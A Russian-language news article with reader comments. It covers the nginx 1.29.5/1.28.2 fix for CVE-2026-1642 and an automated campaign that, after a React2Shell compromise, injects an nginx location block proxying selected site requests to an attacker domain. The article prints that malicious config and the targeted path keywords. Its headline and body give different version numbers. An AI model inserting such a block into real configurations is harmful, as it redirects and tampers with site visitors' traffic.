The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Nginx 1.29.4 с устранением уязвимости. Атаки, меняющие настройки nginx для перенаправления трафика

05.02.2026 19:19 (MSK)

Сформирован выпуск основной ветки nginx 1.29.5, в рамках которой продолжается развитие новых возможностей, а также выпуск параллельно поддерживаемой стабильной ветки nginx 1.28.2, в которую вносятся только изменения, связанные с устранением серьёзных ошибок и уязвимостей. В обновлениях устранена уязвимость (CVE-2026-1642), позволяющая атакующему, имеющему возможность вклиниться (MITM) в канал связи между nginx и upstream-сервером, подставить отправляемые клиенту ответы. Проблема затрагивает конфигурации, проксирующие запросы (HTTP 1.x, HTTP/2, gRPC или uWSGI) к вышестоящему серверу с использованием TLS-шифрования.

Помимо уязвимости в выпуске 1.29.5 снижен с "crit" до "info" уровень логгирования SSL-ошибок "ech_required", а также устранено несколько проблем: устранено обращение к уже освобождённой памяти (use-after-free) после переключения на следующий бэкенд gRPC или HTTP/2; решена проблема с отправкой некорректного запроса HTTP/2 после переключения на следующий upstream-сервер; исправлено разрастание размера ответа с несколькими диапазонами; налажено выставление переменной HTTP_HOST при проксировании к бэкендам FastCGI, SCGI и uwsgi.


Дополнительно можно отметить выявление автоматизированной атаки, которая после успешного взлома серверов ограничивается изменением конфигурации nginx. Взлом осуществляется через неисправленную уязвимость React2Shell в серверных компонентах React на системах с панелями управления хостингом, такими как Baota (BT). Вносимые в конфигурацию nginx изменения перенаправляли запросы к обслуживаемым сайтам на сервер атакующих, который осуществлял подстановку вредоносных изменений в возвращаемый пользователю ответ.


   location /%PATH%/ {
       set $fullurl "$scheme://$host$request_uri";
       rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
       proxy_set_header Host [Attacker_Domain];
       proxy_set_header X-Real-IP $remote_addr;
       proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
       proxy_set_header X-Forwarded-Proto $scheme;
       proxy_set_header User-Agent $http_user_agent;
       proxy_set_header Referer $http_referer;
       proxy_ssl_server_name on;
       proxy_pass http://[Attacker_Domain];
   }

Таким образом вместо установки руткитов или вредоносного ПО на сервер, организована атака на клиентов, открывающих обслуживаемый на сервере сайт, без непосредственного изменения компонентов сайта на сервере. Атака в основном нацелена на перехват трафика доменов азиатских стран, а также доменов *.edu и *.gov. Через сервер атакующих перенаправляются выборочные запросы, например, содержащие в путях слова "pg", "pgslot", "slot", "game", "casino", "live", "help", "news", "page", "blog", "about", "support" и "info". Атака производится автоматизированно с использованием инструментария, выполняющего поиск и анализ конфигурации nginx, выбор и подстановку шаблона настроек, перезапуск nginx и проверку работы изменённого варианта.



  1. Главная ссылка к новости (https://github.com/nginx/nginx...)
  2. OpenNews: Выпуск nginx 1.29.4 с поддержкой ECH и взаимодействия с бэкендами по HTTP/2.0
  3. OpenNews: Выпуск Angie 1.11.0, форка Nginx
  4. OpenNews: Новая версия nginx 1.29.0
  5. OpenNews: Выпуск nginx 1.28.0 и форка FreeNginx 1.28.0
  6. OpenNews: Уязвимость в серверных компонентах React, позволяющая выполнить код на сервере
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/64747-nginx
Ключевые слова: nginx, attack
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (10) RSS
  • 1.2, FSA (ok), 20:26, 05/02/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А почему React приложение имеет доступ к конфигурации nginx? Оно же вроде под отдельным пользователем должно было быть, а сам nginx работает под отдельным пользователем.
     
     
  • 2.3, Аноним (3), 20:32, 05/02/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Получали доступ к панели управления хостингом.
     
     
  • 3.11, FSA (ok), 20:54, 05/02/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ааа, блин, читаю книгу, вижу фигу. Точно.
     

  • 1.4, Rev (ok), 20:33, 05/02/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Так, я не понял, после обновления nginx надо проверить все его конфиги на предмет изменения?
     
     
  • 2.7, Аноним (7), 20:44, 05/02/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Желательно всегда это делать, и не только с nginx.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2026 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру